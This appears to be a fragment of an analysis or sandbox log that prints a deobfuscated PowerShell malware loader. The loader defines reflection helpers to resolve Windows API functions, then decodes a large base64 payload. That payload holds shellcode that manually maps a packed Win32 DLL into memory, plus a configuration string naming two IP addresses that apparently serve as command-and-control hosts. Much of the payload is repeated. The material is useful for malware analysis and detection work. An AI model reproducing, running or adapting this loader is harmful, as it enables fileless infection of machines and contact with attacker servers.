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") returned="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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